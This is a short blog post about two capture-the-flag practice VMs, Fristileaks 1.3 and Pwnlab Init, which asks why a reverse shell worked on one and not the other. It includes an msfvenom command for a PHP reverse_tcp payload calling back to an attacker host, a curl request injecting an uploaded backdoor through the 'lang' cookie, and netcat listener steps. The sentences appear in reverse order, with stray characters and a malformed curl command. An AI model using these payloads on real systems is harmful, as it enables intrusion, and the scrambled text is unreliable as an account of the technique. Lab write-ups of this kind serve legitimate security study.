I then used the below curl query to pass the page with the uploaded php backdoor to the lang variable, and then netcat to my attacking machine, which I had already set to listen for a connection curl -output -b lang=./upload/6a8c0c37efded4d620a5c59990f07b90.png Ĭan anybody shed any light on why it was so easy to establish a reverse shell in one instance and more involved in another? What is going on behind the scenes in the Pwnlab VM such that visiting the URL with the uploaded reverse shell script does not work, but exploiting the lang variable with a PHP backdoor is sufficient? Then, I had to exploit the below vulnerability on the index.php page, which allows for injection into the lang cookie if (isset($_COOKIE)) What I had to do, ultimately, was upload a php backdoor script: (/usr/share/webshells/php/simple-backdoor.php) I tried uploading the same reverse shell script but I was not able to get access after setting up a netcat listener. It was much more difficult to establish a connection on the Pwnlab Init VM.Īgain, I gained login access to the website’s upload page. Once I uploaded the script, I found the url for the picture/script, set up a netcat listener on my attacking machine, and then visited the page with the script and that was enough to establish a connection between the target and attacker. I had to rename the script from shell.php to because the site only let me upload pictures. I used msfvenom for the script: msfvenom -p php/meterpreter/reverse_tcp LHOST=.xxx LPORT=xxxx -f raw > shell.php I was able to get login credentials to the website and upload a php reverse shell. I have recently done two different hackable VMs and had to take, after reading walkthroughs, two different approaches.įor Fristileaks 1.3, it was simple.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |